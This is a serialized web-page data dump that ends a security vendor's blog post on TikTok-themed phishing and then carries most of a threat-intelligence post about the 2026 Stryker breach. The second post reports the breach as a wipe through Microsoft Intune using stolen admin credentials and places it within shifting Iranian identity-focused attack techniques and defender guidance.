02,9808,9814,9820,9825,9832],{"sys":9740,"__typename":6371,"content":9741,"name":9777,"title":118},{"id":9192},{"json":9742},{"data":9743,"content":9744,"nodeType":1259},{},[9745],{"data":9746,"content":9747,"nodeType":1258},{},[9748,9752,9761,9765,9773],{"data":9749,"marks":9750,"value":9751,"nodeType":1257},{},[],"We’ve ",{"data":9753,"content":9755,"nodeType":1364},{"uri":9754},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs/",[9756],{"data":9757,"marks":9758,"value":9760,"nodeType":1257},{},[9759],{"type":1372},"reported extensively",{"data":9762,"marks":9763,"value":9764,"nodeType":1257},{},[]," about malvertising scams in the past — particularly targeting Google Ad Manager accounts. Attackers take over Ad Manager accounts and use them to deploy even more malicious ads, harvesting account credentials via AITM phishing pages and ClickFix-style malware delivery (dropping infostealers and remote access tools). They also run ",{"data":9766,"content":9767,"nodeType":1364},{"uri":7710},[9768],{"data":9769,"marks":9770,"value":9772,"nodeType":1257},{},[9771],{"type":1372},"ad fraud campaigns",{"data":9774,"marks":9775,"value":9776,"nodeType":1257},{},[]," siphoning company ad budgets into their own pockets. ","Tiktok phishing insight box 1",{"sys":9779,"__typename":6482,"title":9780,"arcadeDemoUrl":9781,"playText":9782},{"id":9286},"Tiktok phishing demo","https://demo.arcade.software/i0NCDltufFhv8xouaTxr?embed","30 secs",{"sys":9784,"__typename":6404,"title":9785,"caption":9785,"layoutMode":118,"file":9786},{"id":9307},"Push example detection timeline showing the initial redirect. 
In this example Push was configured to Monitor only mode, rather than Block mode.",{"url":9787,"width":9788,"height":9789},"https://images.ctfassets.net/y1cdw1ablpvd/5WAwawK6I0Ez56HE9icvO4/6ad8fedf0c6b72b29b1664ea854593be/image8.png",1802,954,{"sys":9791,"__typename":6404,"title":9792,"caption":9792,"layoutMode":118,"file":9793},{"id":9313},"Initial Cloudflare Turnstile bot check to block security bots from analyzing the page.",{"url":9794,"width":6471,"height":9795},"https://images.ctfassets.net/y1cdw1ablpvd/28rZywTFT0ro4dhWPCfwAJ/6a8342f9bb785db5ed8677939921645d/image6.png",1131,{"sys":9797,"__typename":6404,"title":9798,"caption":9798,"layoutMode":118,"file":9799},{"id":9319},"TikTok for Business themed page.",{"url":9800,"width":6471,"height":9801},"https://images.ctfassets.net/y1cdw1ablpvd/7uoSoE5xwXEBA3tCIOReTX/3e8b06e18097f8625f3edaa92ba770d1/image2.png",1142,{"sys":9803,"__typename":6404,"title":9804,"caption":9804,"layoutMode":118,"file":9805},{"id":9325},"Google Careers themed landing page.",{"url":9806,"width":6471,"height":9807},"https://images.ctfassets.net/y1cdw1ablpvd/5NQmzcYtnsqONZFMljk1Z8/354a8721f4c2195c1aa88b3258a073f1/image1.png",1213,{"sys":9809,"__typename":6404,"title":9810,"caption":9810,"layoutMode":118,"file":9811},{"id":9331},"TikTok for Business themed login page.  The fake page has replaced the “Log in with TikTok” button with “Log in with Google”. 
",{"url":9812,"width":6471,"height":9813},"https://images.ctfassets.net/y1cdw1ablpvd/5rDbxr6ZkcbGv2f6opf6TE/c6997fa3fe50426dae17c6578e2c04f1/image4.png",1191,{"sys":9815,"__typename":6404,"title":9816,"caption":9816,"layoutMode":118,"file":9817},{"id":9337},"The TikTok login page has input validation that requires a business email address.",{"url":9818,"width":6471,"height":9819},"https://images.ctfassets.net/y1cdw1ablpvd/1ba6sQzfR3hjeQHyx8zjae/f588da1242c68ea03ee149d489ee272e/image7.png",1127,{"sys":9821,"__typename":6404,"title":9822,"caption":9822,"layoutMode":118,"file":9823},{"id":9343},"Cloned Google login page hosting an AITM phishing kit.",{"url":9824,"width":6471,"height":9801},"https://images.ctfassets.net/y1cdw1ablpvd/6aGrOKJBuwAPalVYgx4P9u/41a456ba585767c6af8637bab392cabf/image5.png",{"sys":9826,"__typename":9827,"type":9828,"ctaText":9829,"buttonLabel":9830,"buttonColour":9831,"buttonUrl":66},{"id":9489},"CtaWidget","Custom","Learn about the browser attack techniques security teams must contend with in 2026","Get the Report","sunny orange",{"sys":9833,"__typename":9827,"type":9828,"ctaText":9834,"buttonLabel":9835,"buttonColour":9831,"buttonUrl":47},{"id":9726},"Get ahead of the latest browser attacks with our new webinar series, featuring guest experts John Hammond, Troy Hunt, Matt Johansen, and more!","Register 
Now","content:blog:tiktok-phishing.json","blog/tiktok-phishing.json","blog/tiktok-phishing",{"_path":9840,"_dir":1242,"_draft":6,"_partial":6,"_locale":31,"sys":9841,"ogImage":118,"summary":9844,"title":9855,"subtitle":118,"metaTitle":9856,"synopsis":9857,"hashTags":118,"publishedDate":9858,"slug":9859,"tagsCollection":9860,"content":9866,"authorsCollection":10812,"relatedBlogPostsCollection":10816,"_id":12929,"_type":6653,"_source":6654,"_file":12930,"_stem":12931,"_extension":6653},"/blog/stryker-handala-report",{"id":9842,"publishedAt":9843},"10hUzI9iiY8fFtmlA0M9Ne","2026-03-25T11:55:19.329Z",{"json":9845},{"data":9846,"content":9847,"nodeType":1259},{},[9848],{"data":9849,"content":9850,"nodeType":1258},{},[9851],{"data":9852,"marks":9853,"value":9854,"nodeType":1257},{},[],"The Stryker breach doesn't track with Handala's historical TTPs. This shows just how quickly the default attacker toolkit is evolving, and is a wake-up call for defenders.","The Stryker breach didn't match the playbook. That shouldn't be a surprise.","Analyzing Iran-nexus TTP evolution in 2026","Analysing the Stryker breach in line with recent changes to the Iran-nexus cyber playbook.","2026-03-19T00:00:00.000Z","stryker-handala-report",{"items":9861},[9862,9864],{"sys":9863,"name":1270},{"id":1269},{"sys":9865,"name":1274},{"id":1273},{"json":9867,"links":10773},{"nodeType":1259,"data":9868,"content":9869},{},[9870,9877,9883,9902,9905,9913,9920,9927,9930,9938,9945,10121,10128,10135,10138,10146,10153,10160,10167,10174,10177,10185,10204,10211,10219,10226,10371,10390,10398,10405,10540,10559,10565,10568,10576,10583,10590,10597,10600,10608,10648,10679,10686,10691,10694,10702,10709,10716,10723,10726,10733,10740],{"nodeType":1258,"data":9871,"content":9872},{},[9873],{"nodeType":1257,"value":9874,"marks":9875,"data":9876},"On the morning of March 11, employees at Stryker Corporation offices across 79 countries turned on their laptops and found them wiped and unusable. 
Personal phones enrolled in the company's BYOD programme had been factory reset overnight, taking photos, banking apps, and authenticator tokens with them. Login pages had also been defaced with the logo of Handala, a persona operated by Iran's Ministry of Intelligence and Security (MOIS).",[],{},{"nodeType":1335,"data":9878,"content":9882},{"target":9879},{"sys":9880},{"id":9881,"type":1340,"linkType":1341},"6JtlGFq0RDoW9g6zyAcPvn",[],{"nodeType":1258,"data":9884,"content":9885},{},[9886,9890,9898],{"nodeType":1257,"value":9887,"marks":9888,"data":9889},"In a break from the standard Handala playbook, there was no ransomware, no malware, and no exploit chain. The attacker ",[],{},{"nodeType":1364,"data":9891,"content":9893},{"uri":9892},"https://www.bleepingcomputer.com/news/security/stryker-attack-wiped-tens-of-thousands-of-devices-no-malware-needed/",[9894],{"nodeType":1257,"value":9895,"marks":9896,"data":9897},"simply logged into Microsoft Intune",[],{},{"nodeType":1257,"value":9899,"marks":9900,"data":9901}," with compromised Global Administrator credentials, abused a legitimate feature, and wiped over 80,000 systems, servers, and mobile devices.",[],{},{"nodeType":1307,"data":9903,"content":9904},{},[],{"nodeType":1311,"data":9906,"content":9907},{},[9908],{"nodeType":1257,"value":9909,"marks":9910,"data":9912},"What a Handala attack was supposed to look like",[9911],{"type":1318},{},{"nodeType":1258,"data":9914,"content":9915},{},[9916],{"nodeType":1257,"value":9917,"marks":9918,"data":9919},"Handala has a reputation for being a manual, hands-on intrusion team whose TTPs have typically included VPN credential brute-force for initial access (hundreds of logon attempts from commercial VPN nodes), supply chain compromise via managed service providers, RDP as the primary lateral movement method, ADRecon for Active Directory enumeration, LSASS credential dumping via comsvcs.dll, and GPO logon scripts for wiper 
distribution.",[],{},{"nodeType":1258,"data":9921,"content":9922},{},[9923],{"nodeType":1257,"value":9924,"marks":9925,"data":9926},"If you had invested in detection logic around Handala's documented toolkit (BiBi Wiper file extensions, Cl Wiper's EldoS RawDisk driver calls, No-Justice partition table manipulation, Karma Shell's Base64-with-XOR web shell patterns) none of it would have fired. Wiper malware signatures, web shell indicators, RawDisk driver loading, MBR/GPT manipulation, SharePoint exploitation patterns, anomalous RDP/SMB lateral movement: all reasonable detection priorities given the group's threat intelligence profile, but all irrelevant when it mattered most.",[],{},{"nodeType":1307,"data":9928,"content":9929},{},[],{"nodeType":1311,"data":9931,"content":9932},{},[9933],{"nodeType":1257,"value":9934,"marks":9935,"data":9937},"What Handala actually did",[9936],{"type":1318},{},{"nodeType":1258,"data":9939,"content":9940},{},[9941],{"nodeType":1257,"value":9942,"marks":9943,"data":9944},"The Stryker attack departs from the documented baseline across the kill chain.",[],{},{"nodeType":4291,"data":9946,"content":9947},{},[9948,9985,10022,10055,10088],{"nodeType":4295,"data":9949,"content":9950},{},[9951,9963,9974],{"nodeType":9952,"data":9953,"content":9954},"table-header-cell",{},[9955],{"nodeType":1258,"data":9956,"content":9957},{},[9958],{"nodeType":1257,"value":9959,"marks":9960,"data":9962},"Kill chain phase",[9961],{"type":1318},{},{"nodeType":9952,"data":9964,"content":9965},{},[9966],{"nodeType":1258,"data":9967,"content":9968},{},[9969],{"nodeType":1257,"value":9970,"marks":9971,"data":9973},"Historical TTP",[9972],{"type":1318},{},{"nodeType":9952,"data":9975,"content":9976},{},[9977],{"nodeType":1258,"data":9978,"content":9979},{},[9980],{"nodeType":1257,"value":9981,"marks":9982,"data":9984},"Stryker 
TTP",[9983],{"type":1318},{},{"nodeType":4295,"data":9986,"content":9987},{},[9988,9998,10008],{"nodeType":4299,"data":9989,"content":9990},{},[9991],{"nodeType":1258,"data":9992,"content":9993},{},[9994],{"nodeType":1257,"value":9995,"marks":9996,"data":9997},"Initial access",[],{},{"nodeType":4299,"data":9999,"content":10000},{},[10001],{"nodeType":1258,"data":10002,"content":10003},{},[10004],{"nodeType":1257,"value":10005,"marks":10006,"data":10007},"VPN credential brute-force, supply chain compromise of managed service providers and IT vendors, spearphishing with wiper delivery, exploitation of SharePoint and Windows server vulnerabilities",[],{},{"nodeType":4299,"data":10009,"content":10010},{},[10011],{"nodeType":1258,"data":10012,"content":10013},{},[10014,10018],{"nodeType":1257,"value":10015,"marks":10016,"data":10017},"I",[],{},{"nodeType":1257,"value":10019,"marks":10020,"data":10021},"dentity compromise targeting Microsoft Entra ID",[],{},{"nodeType":4295,"data":10023,"content":10024},{},[10025,10035,10045],{"nodeType":4299,"data":10026,"content":10027},{},[10028],{"nodeType":1258,"data":10029,"content":10030},{},[10031],{"nodeType":1257,"value":10032,"marks":10033,"data":10034},"Persistence",[],{},{"nodeType":4299,"data":10036,"content":10037},{},[10038],{"nodeType":1258,"data":10039,"content":10040},{},[10041],{"nodeType":1257,"value":10042,"marks":10043,"data":10044},"Web shells (Karma Shell, reGeorg)",[],{},{"nodeType":4299,"data":10046,"content":10047},{},[10048],{"nodeType":1258,"data":10049,"content":10050},{},[10051],{"nodeType":1257,"value":10052,"marks":10053,"data":10054},"Global Administrator access to cloud tenant, no persistence mechanism needed",[],{},{"nodeType":4295,"data":10056,"content":10057},{},[10058,10068,10078],{"nodeType":4299,"data":10059,"content":10060},{},[10061],{"nodeType":1258,"data":10062,"content":10063},{},[10064],{"nodeType":1257,"value":10065,"marks":10066,"data":10067},"Lateral 
movement",[],{},{"nodeType":4299,"data":10069,"content":10070},{},[10071],{"nodeType":1258,"data":10072,"content":10073},{},[10074],{"nodeType":1257,"value":10075,"marks":10076,"data":10077},"RDP, SMB, FTP, Mimikatz",[],{},{"nodeType":4299,"data":10079,"content":10080},{},[10081],{"nodeType":1258,"data":10082,"content":10083},{},[10084],{"nodeType":1257,"value":10085,"marks":10086,"data":10087},"None required, Intune console provides global reach from a single session",[],{},{"nodeType":4295,"data":10089,"content":10090},{},[10091,10101,10111],{"nodeType":4299,"data":10092,"content":10093},{},[10094],{"nodeType":1258,"data":10095,"content":10096},{},[10097],{"nodeType":1257,"value":10098,"marks":10099,"data":10100},"Impact",[],{},{"nodeType":4299,"data":10102,"content":10103},{},[10104],{"nodeType":1258,"data":10105,"content":10106},{},[10107],{"nodeType":1257,"value":10108,"marks":10109,"data":10110},"Custom wiper malware (BiBi, Cl Wiper, No-Justice, Hatef)",[],{},{"nodeType":4299,"data":10112,"content":10113},{},[10114],{"nodeType":1258,"data":10115,"content":10116},{},[10117],{"nodeType":1257,"value":10118,"marks":10119,"data":10120},"Microsoft Intune Remote Wipe, a legitimate built-in administrative feature",[],{},{"nodeType":1258,"data":10122,"content":10123},{},[10124],{"nodeType":1257,"value":10125,"marks":10126,"data":10127},"An organisation with detections built around malware signatures, file system manipulation, and anomalous process execution would be unprepared for an attack with zero malware artifacts, where every action was a legitimate administrative command.",[],{},{"nodeType":1258,"data":10129,"content":10130},{},[10131],{"nodeType":1257,"value":10132,"marks":10133,"data":10134},"But while the methods were different, the core objective — mass destruction of data — is entirely consistent with previous campaigns, just through a legitimate management plane rather than custom 
malware.",[],{},{"nodeType":1307,"data":10136,"content":10137},{},[],{"nodeType":1311,"data":10139,"content":10140},{},[10141],{"nodeType":1257,"value":10142,"marks":10143,"data":10145},"The kill chain looks different now",[10144],{"type":1318},{},{"nodeType":1258,"data":10147,"content":10148},{},[10149],{"nodeType":1257,"value":10150,"marks":10151,"data":10152},"The attack path was devastatingly simple. It didn't require lateral movement because there was nothing to move laterally through. It didn't require privilege escalation because they directly compromised a global administrator account. Every device managed by Intune was already within reach.",[],{},{"nodeType":1258,"data":10154,"content":10155},{},[10156],{"nodeType":1257,"value":10157,"marks":10158,"data":10159},"The traditional network-centric kill chain collapses into: compromise identity, access management plane, execute objective.",[],{},{"nodeType":1258,"data":10161,"content":10162},{},[10163],{"nodeType":1257,"value":10164,"marks":10165,"data":10166},"This is not specific to Iran-aligned actors. Russian groups are leveraging AITM phishing kits and abusing Microsoft 365 OAuth tokens via consent attacks. Scattered Spider built an operational model around social engineering and SSO account takeover. And now Handala has demonstrated that a nation-state destructive operation can be executed entirely by abusing legitimate enterprise tooling.",[],{},{"nodeType":1258,"data":10168,"content":10169},{},[10170],{"nodeType":1257,"value":10171,"marks":10172,"data":10173},"This kind of attack is more direct, faster to execute, and carries a significantly lower barrier to entry. 
You don't need custom malware and exploit development when you can log in using as-a-Service kits or partner with an access brokering specialist.",[],{},{"nodeType":1307,"data":10175,"content":10176},{},[],{"nodeType":1311,"data":10178,"content":10179},{},[10180],{"nodeType":1257,"value":10181,"marks":10182,"data":10184},"The big picture of Iranian cyber TTPs",[10183],{"type":1318},{},{"nodeType":1258,"data":10186,"content":10187},{},[10188,10192,10200],{"nodeType":1257,"value":10189,"marks":10190,"data":10191},"Iran's offensive cyber capability is split between two rival intelligence bureaucracies. The Ministry of Intelligence and Security (MOIS) runs groups like APT34, MuddyWater, Scarred Manticore, and Void Manticore (Handala), which tend toward long-dwell espionage and coordinated destructive operations, often using a ",[],{},{"nodeType":1364,"data":10193,"content":10195},{"uri":10194},"https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/",[10196],{"nodeType":1257,"value":10197,"marks":10198,"data":10199},"documented dual-actor handoff model",[],{},{"nodeType":1257,"value":10201,"marks":10202,"data":10203}," where Scarred Manticore conducts stealthy espionage before handing targets to Void Manticore (Handala) for destruction.",[],{},{"nodeType":1258,"data":10205,"content":10206},{},[10207],{"nodeType":1257,"value":10208,"marks":10209,"data":10210},"The Islamic Revolutionary Guard Corps (IRGC) runs a wider set of groups, including APT33/Peach Sandstorm, APT35/Charming Kitten, APT42, Tortoiseshell/Imperial Kitten, Cotton Sandstorm, and CyberAv3ngers. IRGC groups cover espionage, destructive attacks, influence operations, election interference, ICS targeting across U.S. 
water and wastewater facilities), and individual surveillance.",[],{},{"nodeType":1468,"data":10212,"content":10213},{},[10214],{"nodeType":1257,"value":10215,"marks":10216,"data":10218},"IRGC groups have already shifted to identity-first TTPs",[10217],{"type":1318},{},{"nodeType":1258,"data":10220,"content":10221},{},[10222],{"nodeType":1257,"value":10223,"marks":10224,"data":10225},"On the IRGC side, the shift toward identity-centric operations is well-documented:",[],{},{"nodeType":1884,"data":10227,"content":10228},{},[10229,10280,10318,10345],{"nodeType":1888,"data":10230,"content":10231},{},[10232],{"nodeType":1258,"data":10233,"content":10234},{},[10235,10240,10244,10252,10256,10264,10268,10276],{"nodeType":1257,"value":10236,"marks":10237,"data":10239},"APT33/Peach Sandstorm",[10238],{"type":1318},{},{"nodeType":1257,"value":10241,"marks":10242,"data":10243}," shifted decisively toward credential-based initial access starting in early 2023, with Microsoft ",[],{},{"nodeType":1364,"data":10245,"content":10247},{"uri":10246},"https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/",[10248],{"nodeType":1257,"value":10249,"marks":10250,"data":10251},"documenting",[],{},{"nodeType":1257,"value":10253,"marks":10254,"data":10255}," large-scale password spray campaigns targeting thousands of organisations, ",[],{},{"nodeType":1364,"data":10257,"content":10259},{"uri":10258},"https://www.bleepingcomputer.com/news/security/iranian-hackers-breach-defense-orgs-in-password-spray-attacks/",[10260],{"nodeType":1257,"value":10261,"marks":10262,"data":10263},"Golden SAML",[],{},{"nodeType":1257,"value":10265,"marks":10266,"data":10267}," attacks for persistent cloud access, and the use of 
",[],{},{"nodeType":1364,"data":10269,"content":10271},{"uri":10270},"https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/",[10272],{"nodeType":1257,"value":10273,"marks":10274,"data":10275},"fraudulent Azure subscriptions",[],{},{"nodeType":1257,"value":10277,"marks":10278,"data":10279}," for C2 infrastructure.",[],{},{"nodeType":1888,"data":10281,"content":10282},{},[10283],{"nodeType":1258,"data":10284,"content":10285},{},[10286,10291,10294,10302,10306,10314],{"nodeType":1257,"value":10287,"marks":10288,"data":10290},"APT42",[10289],{"type":1318},{},{"nodeType":1257,"value":3548,"marks":10292,"data":10293},[],{},{"nodeType":1364,"data":10295,"content":10297},{"uri":10296},"https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations",[10298],{"nodeType":1257,"value":10299,"marks":10300,"data":10301},"assessed by Mandiant to operate on behalf of the IRGC-IO, ",[],{},{"nodeType":1257,"value":10303,"marks":10304,"data":10305},"has made credential harvesting and MFA bypass its core competency, operating almost entirely within cloud environments post-compromise and ",[],{},{"nodeType":1364,"data":10307,"content":10309},{"uri":10308},"https://cloud.google.com/blog/topics/threat-intelligence/apt42-charms-cons-compromises",[10310],{"nodeType":1257,"value":10311,"marks":10312,"data":10313},"registering its own Microsoft Authenticator",[],{},{"nodeType":1257,"value":10315,"marks":10316,"data":10317}," on compromised accounts for persistent access.",[],{},{"nodeType":1888,"data":10319,"content":10320},{},[10321],{"nodeType":1258,"data":10322,"content":10323},{},[10324,10329,10333,10341],{"nodeType":1257,"value":10325,"marks":10326,"data":10328},"APT35",[10327],{"type":1318},{},{"nodeType":1257,"value":10330,"marks":10331,"data":10332}," (aka Imperial Kitten/Tortoiseshell) was observed 
",[],{},{"nodeType":1364,"data":10334,"content":10336},{"uri":10335},"https://www.crowdstrike.com/explore/2026-global-threat-report?utm_medium=org",[10337],{"nodeType":1257,"value":10338,"marks":10339,"data":10340},"targeting cloud identities in November 2025",[],{},{"nodeType":1257,"value":10342,"marks":10343,"data":10344},", deploying the Evilginx2 AitM toolkit against Microsoft 365 users in Israel.",[],{},{"nodeType":1888,"data":10346,"content":10347},{},[10348],{"nodeType":1258,"data":10349,"content":10350},{},[10351,10356,10360,10367],{"nodeType":1257,"value":10352,"marks":10353,"data":10355},"CrustyKrill",[10354],{"type":1318},{},{"nodeType":1257,"value":10357,"marks":10358,"data":10359}," (TA455/Smoke Sandstorm) ",[],{},{"nodeType":1364,"data":10361,"content":10362},{"uri":10335},[10363],{"nodeType":1257,"value":10364,"marks":10365,"data":10366},"uses fake Google Meet and Microsoft Teams pages",[],{},{"nodeType":1257,"value":10368,"marks":10369,"data":10370}," with a live operator intercepting 2FA codes in real time, alongside Azure Web Apps for C2.",[],{},{"nodeType":1258,"data":10372,"content":10373},{},[10374,10378,10386],{"nodeType":1257,"value":10375,"marks":10376,"data":10377},"A ",[],{},{"nodeType":1364,"data":10379,"content":10381},{"uri":10380},"https://media.defense.gov/2024/Oct/16/2003565317/-1/-1/0/CSA-IRAN-CYBER-BRUTE-FORCE-CRITICAL-INFRASTRUCTURE-ORGS.PDF",[10382],{"nodeType":1257,"value":10383,"marks":10384,"data":10385},"joint advisory from six nations",[],{},{"nodeType":1257,"value":10387,"marks":10388,"data":10389}," (FBI, CISA, NSA, CSE, AFP, ASD, advisory AA24-290A, October 2024) confirmed the pattern at the government level, documenting Iranian actors using brute force, password spraying, and MFA push bombing to compromise critical infrastructure accounts since October 2023, and assessing that the actors sell this access on cybercriminal 
forums.",[],{},{"nodeType":1468,"data":10391,"content":10392},{},[10393],{"nodeType":1257,"value":10394,"marks":10395,"data":10397},"MOIS groups are changing their approach too",[10396],{"type":1318},{},{"nodeType":1258,"data":10399,"content":10400},{},[10401],{"nodeType":1257,"value":10402,"marks":10403,"data":10404},"On the MOIS side, the documented TTP baseline has historically centred on custom malware, network-level persistence, and exploitation of on-premises infrastructure. But identity compromise, particularly credential theft, has been a consistent thread across broader MOIS groups too:",[],{},{"nodeType":1884,"data":10406,"content":10407},{},[10408,10447,10474,10525],{"nodeType":1888,"data":10409,"content":10410},{},[10411],{"nodeType":1258,"data":10412,"content":10413},{},[10414,10419,10423,10431,10435,10443],{"nodeType":1257,"value":10415,"marks":10416,"data":10418},"APT34 (OilRig) ",[10417],{"type":1318},{},{"nodeType":1257,"value":10420,"marks":10421,"data":10422},"built its reputation on DNS tunnelling and custom backdoors, but its initial access methods include spearphishing and fake VPN portals for credential harvesting. 
Its 2024 campaigns introduced ",[],{},{"nodeType":1364,"data":10424,"content":10426},{"uri":10425},"https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html",[10427],{"nodeType":1257,"value":10428,"marks":10429,"data":10430},"password filter DLLs",[],{},{"nodeType":1257,"value":10432,"marks":10433,"data":10434}," registered at the domain controller level to intercept plaintext credentials during password change events, with the ",[],{},{"nodeType":1364,"data":10436,"content":10438},{"uri":10437},"https://www.bleepingcomputer.com/news/security/oilrig-hackers-now-exploit-windows-flaw-to-elevate-privileges/",[10439],{"nodeType":1257,"value":10440,"marks":10441,"data":10442},"STEALHOOK backdoor",[],{},{"nodeType":1257,"value":10444,"marks":10445,"data":10446}," exfiltrating stolen domain credentials via compromised Exchange servers. Cloud-based downloaders leveraging OneDrive and Microsoft Graph API were active against Israeli targets from 2022 to 2024.",[],{},{"nodeType":1888,"data":10448,"content":10449},{},[10450],{"nodeType":1258,"data":10451,"content":10452},{},[10453,10458,10462,10470],{"nodeType":1257,"value":10454,"marks":10455,"data":10457},"APT39 (Chafer) ",[10456],{"type":1318},{},{"nodeType":1257,"value":10459,"marks":10460,"data":10461},"operated through the ",[],{},{"nodeType":1364,"data":10463,"content":10465},{"uri":10464},"https://home.treasury.gov/news/press-releases/sm1127",[10466],{"nodeType":1257,"value":10467,"marks":10468,"data":10469},"sanctioned front company Rana Intelligence Computing",[],{},{"nodeType":1257,"value":10471,"marks":10472,"data":10473},", and focuses on surveillance and tracking of individuals, using credential harvesting through spoofed airline and telecom domains across 30+ 
countries.",[],{},{"nodeType":1888,"data":10475,"content":10476},{},[10477],{"nodeType":1258,"data":10478,"content":10479},{},[10480,10485,10489,10497,10501,10509,10513,10521],{"nodeType":1257,"value":10481,"marks":10482,"data":10484},"MuddyWater",[10483],{"type":1318},{},{"nodeType":1257,"value":10486,"marks":10487,"data":10488},", confirmed by a ",[],{},{"nodeType":1364,"data":10490,"content":10492},{"uri":10491},"https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a",[10493],{"nodeType":1257,"value":10494,"marks":10495,"data":10496},"joint CISA/FBI/NSA/NCSC advisory",[],{},{"nodeType":1257,"value":10498,"marks":10499,"data":10500}," as a subordinate element of MOIS, functions as an initial access broker within the ecosystem. Its operations rely on spearphishing and abuse of legitimate RMM tools, but the group has developed ",[],{},{"nodeType":1364,"data":10502,"content":10504},{"uri":10503},"https://thehackernews.com/2025/12/iran-linked-hackers-hits-israeli_2.html",[10505],{"nodeType":1257,"value":10506,"marks":10507,"data":10508},"dedicated credential stealers",[],{},{"nodeType":1257,"value":10510,"marks":10511,"data":10512}," including CE-Notes (which bypasses Chrome's app-bound encryption), Blub (a multi-browser credential extractor), and LP-Notes (fake Windows Security dialogs to capture system credentials). 
A parallel campaign documented by ",[],{},{"nodeType":1364,"data":10514,"content":10516},{"uri":10515},"https://www.group-ib.com/blog/muddywater-espionage/",[10517],{"nodeType":1257,"value":10518,"marks":10519,"data":10520},"Group-IB",[],{},{"nodeType":1257,"value":10522,"marks":10523,"data":10524}," found the group deploying a custom Chromium credential stealer alongside its Phoenix backdoor.",[],{},{"nodeType":1888,"data":10526,"content":10527},{},[10528],{"nodeType":1258,"data":10529,"content":10530},{},[10531,10536],{"nodeType":1257,"value":10532,"marks":10533,"data":10535},"Lyceum (Hexane)",[10534],{"type":1318},{},{"nodeType":1257,"value":10537,"marks":10538,"data":10539}," overlaps operationally with APT34 and uses password spraying and brute-force attacks for initial access, and notably probed Albanian government infrastructure ahead of Handala destructive attacks in 2022, illustrating the collaborative model across MOIS groups.",[],{},{"nodeType":1258,"data":10541,"content":10542},{},[10543,10547,10555],{"nodeType":1257,"value":10544,"marks":10545,"data":10546},"Check Point has also ",[],{},{"nodeType":1364,"data":10548,"content":10550},{"uri":10549},"https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/",[10551],{"nodeType":1257,"value":10552,"marks":10553,"data":10554},"documented",[],{},{"nodeType":1257,"value":10556,"marks":10557,"data":10558}," a broader pattern of MOIS actors engaging directly with the criminal ecosystem, including Handala's adoption of the Rhadamanthys commercial infostealer and Iranian-affiliated operators working through the Qilin ransomware-as-a-service infrastructure.",[],{},{"nodeType":1335,"data":10560,"content":10564},{"target":10561},{"sys":10562},{"id":10563,"type":1340,"linkType":1341},"2SFtROFuPZ4SPTL87Vpjr9",[],{"nodeType":1307,"data":10566,"content":10567},{},[],{"nodeType":1311,"data":10569,"content":10570},{},[10571],{"nodeType":1257,"value":10572,"marks":10573,"data":10575},"The problem 
with over-indexing on TTPs",[10574],{"type":1318},{},{"nodeType":1258,"data":10577,"content":10578},{},[10579],{"nodeType":1257,"value":10580,"marks":10581,"data":10582},"Threat intelligence has real value. Attributing campaigns to named groups, mapping their techniques to MITRE ATT&CK, and generating detection rules give defenders a meaningful starting point. The problem is treating a specific actor's historical TTP catalogue as the primary basis for detection logic, rather than combining it with the broader trends in attacker behaviour visible across the entire landscape.",[],{},{"nodeType":1258,"data":10584,"content":10585},{},[10586],{"nodeType":1257,"value":10587,"marks":10588,"data":10589},"Operators are creative and pragmatic. If the path of least resistance is a compromised admin credential and a legitimate MDM feature, no serious attacker is going to deploy custom wiper malware instead just because that's what they used last time.",[],{},{"nodeType":1258,"data":10591,"content":10592},{},[10593],{"nodeType":1257,"value":10594,"marks":10595,"data":10596},"If your threat model says you're a plausible target for an Iranian threat group, and the trend data tells you that identity compromise is the most common initial access method across all actors, the rational response is to evaluate your controls against identity-based initial access, not just deploy signatures for BiBi Wiper. 
When the specific actor profile crowds out the general trend data, you end up building defences against the last attack and leaving yourself exposed to the shift that every actor is going through.",[],{},{"nodeType":1307,"data":10598,"content":10599},{},[],{"nodeType":1311,"data":10601,"content":10602},{},[10603],{"nodeType":1257,"value":10604,"marks":10605,"data":10607},"Evaluating the security guidance",[10606],{"type":1318},{},{"nodeType":1258,"data":10609,"content":10610},{},[10611,10615,10623,10627,10635,10639,10644],{"nodeType":1257,"value":10612,"marks":10613,"data":10614},"In the wake of the breach, industry guidance has settled around enforcing phishing-resistant MFA on privileged accounts, implementing just-in-time privilege activation via ",[],{},{"nodeType":1364,"data":10616,"content":10618},{"uri":10617},"https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-configure",[10619],{"nodeType":1257,"value":10620,"marks":10621,"data":10622},"PIM",[],{},{"nodeType":1257,"value":10624,"marks":10625,"data":10626},", enabling ",[],{},{"nodeType":1364,"data":10628,"content":10630},{"uri":10629},"https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/multi-admin-approval",[10631],{"nodeType":1257,"value":10632,"marks":10633,"data":10634},"Multi Admin Approval ",[],{},{"nodeType":1257,"value":10636,"marks":10637,"data":10638},"for high-risk Intune operations, configuring anomaly alerting on bulk device actions, and segregating administrative identities from everyday user accounts. 
This is all sound advice, but these recommendations are designed to limit what an attacker can do ",[],{},{"nodeType":1257,"value":10640,"marks":10641,"data":10643},"after",[10642],{"type":191},{},{"nodeType":1257,"value":10645,"marks":10646,"data":10647}," an account has already been compromised — introducing friction, but not blocking them entirely.",[],{},{"nodeType":1258,"data":10649,"content":10650},{},[10651,10655,10663,10667,10675],{"nodeType":1257,"value":10652,"marks":10653,"data":10654},"The detection challenges compound this. Entra ID sign-in logs and ",[],{},{"nodeType":1364,"data":10656,"content":10658},{"uri":10657},"https://www.a6n.co.uk/2025/11/tracking-device-wipes-in-microsoft.html",[10659],{"nodeType":1257,"value":10660,"marks":10661,"data":10662},"Intune audit logs exist in separate systems",[],{},{"nodeType":1257,"value":10664,"marks":10665,"data":10666}," with separate correlation IDs. Tracing a sign-in to a subsequent device action requires deliberate log integration that many organisations haven't implemented. The 